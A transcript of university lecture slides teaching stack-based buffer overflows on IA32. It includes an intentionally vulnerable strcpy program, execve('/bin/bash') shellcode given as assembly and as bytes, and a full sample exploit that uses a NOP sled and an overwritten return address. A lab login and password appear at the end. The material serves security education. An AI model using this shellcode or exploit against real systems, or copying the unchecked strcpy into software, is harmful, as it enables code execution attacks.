Stack-based buffer overflows Yves Younan DistriNet, Department of Computer Science Katholieke Universiteit Leuven Belgium

Slides:



Advertisements
Similar presentations
Recitation 4 Outline Buffer overflow –Practical skills for Lab 3 Code optimization –Strength reduction –Common sub-expression –Loop unrolling Reminders.
Advertisements

Smashing the Stack for Fun and Profit
Hacking: The Art of Exploitation
Exploring Security Vulnerabilities by Exploiting Buffer Overflow using the MIPS ISA Andrew T. Phillips Jack S. E. Tan Department of Computer Science University.
David Brumley Carnegie Mellon University Credit: Some slides from Ed Schwartz.
Recitation 4: 09/30/02 Outline The Stack! Essential skill for Lab 3 –Out-of-bound array access –Put your code on the stack Annie Luo
Exploits Buffer Overflows and Format String Attacks David Brumley Carnegie Mellon University.
Review: Software Security David Brumley Carnegie Mellon University.
Gabe Kanzelmeyer CS 450 4/14/10.  What is buffer overflow?  How memory is processed and the stack  The threat  Stack overrun attack  Dangers  Prevention.
Stack buffer overflow
Foundations of Network and Computer Security J J ohn Black Lecture #29 Nov 12 th 2007 CSCI 6268/TLEN 5831, Fall 2007.
Security Protection and Checking in Embedded System Integration Against Buffer Overflow Attacks Zili Shao, Chun Xue, Qingfeng Zhuge, Edwin H.-M. Sha International.
Buffer Overflow. Process Memory Organization.
Windows XP SP2 Stack Protection Jimmy Hermansson Johan Tibell.
Computer Security Buffer Overflow lab Eu-Jin Goh.
Foundations of Network and Computer Security J J ohn Black Lecture #19 Nov 3 rd 2005 CSCI 6268/TLEN 5831, Fall 2005.
Foundations of Network and Computer Security J J ohn Black Lecture #30 Nov 13 th 2009 CSCI 6268/TLEN 5550, Fall 2009.
September 22, 2014 Pengju (Jimmy) Jin Section E
Attacks Using Stack Buffer Overflow Boxuan Gu
2012/02/07 1 John Wilander, Mariam Kamkar Linkopings Universitet Nick Nikiforakis, Yves Younan, Wouter Joosen Katholieke Universiteit Leuven.
CAP6135: Malware and Software Vulnerability Analysis Buffer Overflow : Example of Using GDB to Check Stack Memory Cliff Zou Spring 2011.
Assembly, Stacks, and Registers Kevin C. Su 9/26/2011.
Exploiting Buffer Overflows on AIX/PowerPC HP-UX/PA-RISC Solaris/SPARC.
CrackChat #2 Stack Overflows and Format Strings Part 2: Baking the Egg
Buffer Overflows : An In-depth Analysis. Introduction Buffer overflows were understood as early as 1972 The legendary Morris Worm made use of a Buffer.
1 #include void silly(){ char s[30]; gets(s); printf("%s\n",s); } main(){ silly(); return 0; }
Buffer Overflow CS461/ECE422 Spring Reading Material Based on Chapter 11 of the text.
Exploitation Of Windows Buffer Overflows. What is a Buffer Overflow A buffer overflow is when memory is copied to a location that is outside of its allocated.
Introduction to InfoSec – Recitation 2 Nir Krakowski (nirkrako at post.tau.ac.il) Itamar Gilad (itamargi at post.tau.ac.il)
Smashing the Stack Overview The Stack Region Buffer Overflow
CS216: Program and Data Representation University of Virginia Computer Science Spring 2006 David Evans Lecture 22: Unconventional.
Part II Let’s make it real Memory Layout of a Process.
ELF binary # readelf -a foo.out ELF Header:
What is exactly Exploit writing?  Writing a piece of code which is capable of exploit the vulnerability in the target software.
Exploits Buffer Overflows and Format String Attacks David Brumley Carnegie Mellon University.
Application Vulnerabilities and Attacks COEN 351.
CS 155 Section 1 PP1 Eu-Jin Goh. Setting up Environment Demo.
International Summer School on Information and System Security Stack Based Buffer Overflows Alberto Ornaghi Lorenzo Cavallaro.
Buffer Overflow Attack- proofing of Code Binaries Ramya Reguramalingam Gopal Gupta Gopal Gupta Department of Computer Science University of Texas at Dallas.
Reminder Bomb lab is due tomorrow! Attack lab is released tomorrow!!
November 2008Buffer Overflow1 King Mongkut’s University of Technology Faculty of Information Technology Network Security Winter 2008 Prof. Reuven Aviv.
Information Security - 2. A Stack Frame. Pushed to stack on function CALL The return address is copied to the CPU Instruction Pointer when the function.
Slides by Kent Seamons and Tim van der Horst Last Updated: Nov 11, 2011.
EXPLOITATION CRASH COURSE – FALL 2013 UTD Computer Security Group – Andrew Folloder csg.utdallas.edu (credit: Scott Hand)
Buffer Overflow Attacks 1 Basic Idea Sample Attacks Protection , Computer & Network Security.
Analyzing C/C++ Vulnerabilities -- Mike Gerschefske.
ROP Exploit. ROP Return Oriented Programming (ROP): is a hacking exploit technique where you exploit buffer overflow to inject a chain of gadgets. Each.
Protecting C and C++ programs from current and future code injection attacks Yves Younan, Wouter Joosen and Frank Piessens DistriNet Department of Computer.
CAP6135: Malware and Software Vulnerability Analysis Buffer Overflow : Example of Using GDB to Check Stack Memory Cliff Zou Spring 2014.
Buffer Overflow Buffer overflows are possible because C doesn’t check array boundaries Buffer overflows are dangerous because buffers for user input are.
Buffer Overflow Walk-Through
Recitation 3: Procedures and the Stack
Assembly function call convention
Introduction to Information Security
The Hardware/Software Interface CSE351 Winter 2013
Homework Reading Machine Projects Labs PAL, pp ,
Exploiting & Defense Day 2 Recap
Buffer Overflow Walk-Through
CMSC 414 Computer and Network Security Lecture 21
CS 465 Buffer Overflow Slides by Kent Seamons and Tim van der Horst
Defeating Instruction Set Randomization Nora Sovarel
Understanding Program Address Space
CAP6135: Malware and Software Vulnerability Analysis Buffer Overflow : Example of Using GDB to Check Stack Memory Cliff Zou Spring 2015.
CNT4704: Analysis of Computer Communication Network Buffer Overflow : Example of Using GDB to Check Stack Memory Cliff Zou Fall 2011.
Foundations of Network and Computer Security
CAP6135: Malware and Software Vulnerability Analysis Buffer Overflow : Example of Using GDB to Check Stack Memory Cliff Zou Spring 2016.
CAP6135: Malware and Software Vulnerability Analysis Buffer Overflow : Example of Using GDB to Check Stack Memory Cliff Zou Spring 2013.
CAP6135: Malware and Software Vulnerability Analysis Buffer Overflow : Example of Using GDB to Check Stack Memory Cliff Zou Spring 2010.
Presentation transcript:

Stack-based buffer overflows Yves Younan DistriNet, Department of Computer Science Katholieke Universiteit Leuven Belgium

Yves Younan - Methodology for Designing Countermeasures against Code injection AttacksMarch 22, Overview  Introduction  Buffer overflows  Stack-based buffer overflows  Shellcode  Code injection  Conclusion

Yves Younan - Methodology for Designing Countermeasures against Code injection AttacksMarch 22, Introduction  Buffer overflows: write outside the boundaries of an array  Can be used to overwrite adjacent memory  The stack contains control-flow related data, e.g. return addresses  Overwriting this data allows an attacker to execute new or existing code

Yves Younan - Methodology for Designing Countermeasures against Code injection AttacksMarch 22, Overview  Introduction  Buffer overflows  Stack-based buffer overflows  Shellcode  Code injection  Conclusion

Yves Younan - Methodology for Designing Countermeasures against Code injection AttacksMarch 22, Buffer overflows (on IA32)  int main(int argc, char **argv) { int a; char buf[100]; strcpy(buf, argv); }  Int a is allocated on the stack: 4 bytes  Buf has memory allocated for 100 chars: 100 bytes  Argv could be larger than that, allowing an attacker to overwrite a in this example

Yves Younan - Methodology for Designing Countermeasures against Code injection AttacksMarch 22, Buffer overflow on IA32 int a char buf[100] High addr Low addr

Yves Younan - Methodology for Designing Countermeasures against Code injection AttacksMarch 22, Overview  Introduction  Buffer overflows  Stack-based buffer overflows  Shellcode  Code injection  Conclusion

Yves Younan - Methodology for Designing Countermeasures against Code injection AttacksMarch 22, Stack based buffer overflows  void f1(char *a) { char buffer[100]; strcpy(buffer, a); }  void f0(char *b) { f1(b); }

Yves Younan - Methodology for Designing Countermeasures against Code injection AttacksMarch 22, Stack frame f1 Stack-based buffer overflows f0: … … call f1 Return address f0 Stack Saved Frame Ptr f0 Local variables f0 Arguments f1 f1: buffer[] … overflow() Buffer Return address f1 Stack frame f0 Injected code Saved Frame Ptr f1 High addr

Yves Younan - Methodology for Designing Countermeasures against Code injection AttacksMarch 22, Overview  Introduction  Buffer overflows  Stack-based buffer overflows  Shellcode  Code injection  Conclusion

Yves Younan - Methodology for Designing Countermeasures against Code injection AttacksMarch 22, Shellcode  Code to execute once the return address has been overwritten  Usually inserted into buffer that is used to overflow  Some subtleties: a NULL will terminate an strcpy, \n will terminate gets

Yves Younan - Methodology for Designing Countermeasures against Code injection AttacksMarch 22, Example code  #include int main() { char *argv[2]; argv[0] = "/bin/bash"; argv[1] = 0; execve(argv[0], argv, 0); }

Yves Younan - Methodology for Designing Countermeasures against Code injection AttacksMarch 22, Example transformed to assembly .type main: push $0x68 # Place h on the stack. push $0x f # Place sab/ on the stack. push $0x6e69622f # Place nib/ on the stack. mov %esp,%ebx # Copy the pointer to /bin/bash to ebx. xor %edx,%edx # Empty edx. push %edx # Place a NULL on the stack to terminate the argv. push %ebx # Place the pointer to /bin/bash on the stack. mov %esp,%ecx # Copy the pointer to the pointer to /bin/bash into ecx. mov $0xb,%eax # Let the syscall know we want execve int $0x80 # Do the system call

Yves Younan - Methodology for Designing Countermeasures against Code injection AttacksMarch 22, Shellcode  (gdb) x/27b main  0x : 0x6a 0x68 0x68 0x2f 0x62 0x61 0x73 0x68  0x : 0x2f 0x62 0x69 0x6e 0x89 0xe3 0x31 0xd2  0x : 0x52 0x53 0x89 0xe1 0xb8 0x0b 0x00 0x00  0x : 0x00 0xcd 0x80

Yves Younan - Methodology for Designing Countermeasures against Code injection AttacksMarch 22, Shellcode .globl main.type main: push $0x68 push $0x f push $0x6e69622f mov %esp,%ebx xor %edx,%edx push %edx push %ebx mov %esp,%ecx xor %eax,%eax # set %eax to 0 mov $0xb,%al # copy 0xb into %al (least signicant byte of %eax) int $0x80

Yves Younan - Methodology for Designing Countermeasures against Code injection AttacksMarch 22, Overview  Introduction  Buffer overflows  Stack-based buffer overflows  Shellcode  Code injection  Conclusion

Yves Younan - Methodology for Designing Countermeasures against Code injection AttacksMarch 22, Sample vulnerable program  void function(int a, char *b) { char string1[10]; char string2[50]; strcpy(string2,b); } int main(int argc, char **argv) { function(1,argv[1]); }

Yves Younan - Methodology for Designing Countermeasures against Code injection AttacksMarch 22, Sample exploit  #include #include char shellcode[] = "\x6a\x68\x68\x2f\x62\x61\x73\x68\x2f\x62\x69\x6e\x89" "\xe3\x31\xd2\x52\x53\x89\xe1\x31\xc0\xb0\x0b\xcd\x80"; #define ADDR 0xbffffe2c int main() { char overflow[72]; char *argv[3] = { "./bufferoverflow", overflow, NULL }; memset(overflow,'\x90',72); // fill with NOPs *(long *) &overflow[68] = ADDR; // replace ret. addr. memcpy(overflow, shellcode, strlen(shellcode)); execve(argv[0],argv,0); // exex program }

Yves Younan - Methodology for Designing Countermeasures against Code injection AttacksMarch 22, Conclusion  Follow “Gera’s Insecure Programming by example” :  ming/ ming/  Login/pass for the computers: cstudy/distrinet